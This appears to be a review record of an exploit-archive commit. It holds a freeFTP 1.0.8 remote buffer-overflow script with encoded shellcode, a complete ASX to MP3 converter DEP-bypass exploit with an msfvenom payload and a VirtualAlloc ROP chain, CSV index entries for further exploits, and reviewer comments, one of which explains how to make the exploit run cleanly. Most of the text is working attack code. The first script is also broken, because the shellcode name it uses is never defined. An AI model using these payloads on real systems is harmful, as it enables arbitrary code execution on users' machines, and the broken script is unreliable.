buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36"
buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32"
buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f"
buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62"
buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57"
buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31"
buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72"
buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44"
buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f"
buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70"
buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73"
buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78"
buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30"
buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b"
buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66"
buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a"
buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e"
buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71"
buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66"
buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f"
buf += "\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52"
buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55"
buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b"
buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42"
buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55"
buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58"
buf += "\x45\x35\x53\x30\x41\x41"
buf = 'A' * 276
buf += '\x90' * 10
buf += shellcode
buf += 'B' * (486 - len(shellcode))
buf += '\x58' # pop eax
buf += '\xfe\xcc' # dec ah
buf += '\xfe\xcc' # dec ah
buf += '\xff\xe0' # jmp eax
buf += 'C' * 4
buf += '\xe8\xf0\xff\xff\xff' # call near
buf += 'D' * 9
buf += '\xeb\xf0\x90\x90' # jump backwards
buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret
buf += 'E' * (1000 - len(buf))
ftp = FTP()
ftp.connect('192.168.1.1', 21)
ftp.login('anonymous', buf)
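Review bot: the hex block is accumulated into `buf` and then immediately discarded by `buf = 'A' * 276`, while the later `buf += shellcode` and `486 - len(shellcode)` refer to a name that is never defined, so the script raises NameError before any connection is attempted; the first block and the later references use different names and need to agree. The header documents neither the shellcode (generator command, size, excluded bytes) nor where the constants 276, 486 and 0x00423dc0 come from, and the `'\x90'` string escapes with `ftplib.login()` imply Python 2; state the interpreter and the module the return address belongs to so the finding can be reproduced and checked against a patched build.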


@ -0,0 +1,114 @@
# Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)
# Google Dork: N/A
# Date: 2019-10-06
# Exploit Author: max7253
# Vendor Homepage: http://www.mini-stream.net/
# Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe
# Version: 3.1.3.7.2010.11.05
# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
# CVE : N/A
# Note: There is a similar exploit published but it doesn't work in the OS I used:
# https://www.exploit-db.com/exploits/42963
# This exploit in the ROP chain uses addresses from ASLR modules. Not sure what OS that exploit was tested on.
import struct
file = 'fuzz_rop.asx'
#Tested on
#OS Name: Microsoft Windows 7 Enterprise
#OS Version: 6.1.7601 Service Pack 1 Build 7601
#System Type: x64-based PC
#msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python
buf = b""
buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28"
buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35"
buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b"
buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6"
buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc"
buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04"
buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49"
buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1"
buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b"
buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86"
buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17"
buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2"
buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40"
buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c"
buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49"
buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc"
payload = "http://"
payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC"
## Save allocation type (0x1000) in EDX
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x11111111)
payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
payload += struct.pack('<L', 0xEEEEFEEF)
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x41414141)
## Save the address of VirtualAlloc() in ESI
payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
payload += struct.pack('<L', 0x41414141)
payload += struct.pack('<L', 0x41414141)
## Save the size of the block in EBX
payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
## Save the address of (# ADD ESP,8 # RETN) in EBP
payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
#payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
## Save memory protection code (0x40) in ECX
payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN
payload += struct.pack('<L', 0xFFFFFFFF)
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
## Save ROP-NOP in EDI
payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
payload += struct.pack('<L', 0x1002D038) # RETN
## Save NOPs in EAX
#payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll]
#payload += struct.pack('<L', 0x90909090) # nop
## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
payload += struct.pack('<L', 0xA4E2F275)
payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN
payload += "\x90" * 4
payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
payload += "\x90" * 20
payload += buf
f = open(file,'w')
f.write(payload)
f.close()
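Review bot: the payload mixes `str` and `bytes` and is written in text mode, so this file only behaves under Python 2. `buf = b""` builds the msfvenom output as bytes, but `payload = "http://"` and `"A" * 17417` are str, and `payload += buf` concatenates the two; under Python 3 that is a TypeError, and even with bytes throughout `f = open(file,'w')` would encode every value above 0x7f as multi-byte UTF-8 and corrupt the ROP addresses. Make every fragment bytes (`payload = b"http://"`, `b"A" * 17417`, `b"\x90" * 4`) and open the file with `'wb'`; the written bytes are then identical under both interpreters. The commented-out gadgets (`#payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN` under the EBP block, and the `## Save NOPs in EAX` pair) are leftovers from chain development and should be removed or explained, since a reader cannot tell whether they are optional alternatives or dead code.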


@ -10699,6 +10699,9 @@ id,file,description,date,author,type,platform,port
47444,exploits/windows/local/47444.py,"DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH)",2019-10-01,"Xavi Beltran",local,windows,
47454,exploits/windows/local/47454.md,"Counter-Strike Global Offensive 1.37.1.1 - 'vphysics.dll' Denial of Service (PoC)",2019-09-18,bi7s,local,windows,
47463,exploits/android/local/47463.txt,"Android - Binder Driver Use-After-Free",2019-10-04,"Google Security Research",local,android,
47466,exploits/linux/local/47466.c,"logrotten 3.15.1 - Privilege Escalation",2019-10-07,"Wolfgang Hotwagner",local,linux,
47468,exploits/windows_x86-64/local/47468.py,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",2019-10-07,max7253,local,windows_x86-64,
47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
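Review bot: the platform column for 47468 looks wrong. The entry is filed as `exploits/windows_x86-64/local/47468.py` with platform `windows_x86-64`, but the exploit targets a 32-bit process: the shellcode is generated with `msfvenom -p windows/exec cmd=calc.exe -a x86 ...` and the ROP chain is built from 32-bit gadgets in MSA2Mfilter03.dll (`0x1002D038`, `0x10047F4D`, ...). The "x64-based PC" in the file header describes the test host, not the target binary. Unless the archive deliberately classifies by host OS, this entry should use `windows` like the adjacent DameWare (47444) and CheckPoint (47471) entries, and the path should change to match.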
@ -17695,6 +17698,7 @@ id,file,description,date,author,type,platform,port
47439,exploits/multiple/remote/47439.txt,"GoAhead 2.5.0 - Host Header Injection",2019-09-30,Ramikan,remote,multiple,
47442,exploits/hardware/remote/47442.py,"Cisco Small Business 220 Series - Multiple Vulnerabilities",2019-09-30,bashis,remote,hardware,
47456,exploits/windows/remote/47456.rb,"DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)",2019-10-02,Metasploit,remote,windows,
47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - Remote Buffer Overflow",2019-10-07,"Chet Manly",remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
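Review bot: the port column is empty for the freeFTP entry (`47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - Remote Buffer Overflow",...,remote,windows,`) although the exploit connects to a fixed port (`ftp.connect('192.168.1.1', 21)`). The older remote entries in this file populate that column (`...,remote,windows,80` and `...,remote,windows,139`), so this row should end in `21` for consistency and for anyone filtering the CSV by service.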
@ -41797,3 +41801,7 @@ id,file,description,date,author,type,platform,port
47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,
47460,exploits/php/webapps/47460.txt,"LabCollector 5.423 - SQL Injection",2019-10-04,"Carlos Avila",webapps,php,
47462,exploits/php/webapps/47462.php,"PHP 7.0 < 7.3 (Unix) - 'gc' Disable Functions Bypass",2019-10-03,mm0r1,webapps,php,
47465,exploits/php/webapps/47465.py,"Joomla 3.4.6 - 'configuration.php' Remote Code Execution",2019-10-07,"Alessandro Groppo",webapps,php,
47467,exploits/php/webapps/47467.txt,"Zabbix 4.2 - Authentication Bypass",2019-10-07,"Milad Khoshdel",webapps,php,
47469,exploits/php/webapps/47469.txt,"Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting",2019-10-07,Creatigon,webapps,php,
47470,exploits/java/webapps/47470.txt,"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload",2019-10-07,"Jakub Palaczynski",webapps,java,
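Review bot: the Subrion description carries a spelling error: `"Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting"` should read `Persistent`. The same misspelling appears in the commit message, so the title of the added 47469.txt file should be checked too, since the CSV description is normally copied from the `# Exploit Title:` header. Otherwise the three rows are in id order and the columns match the rest of the file.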
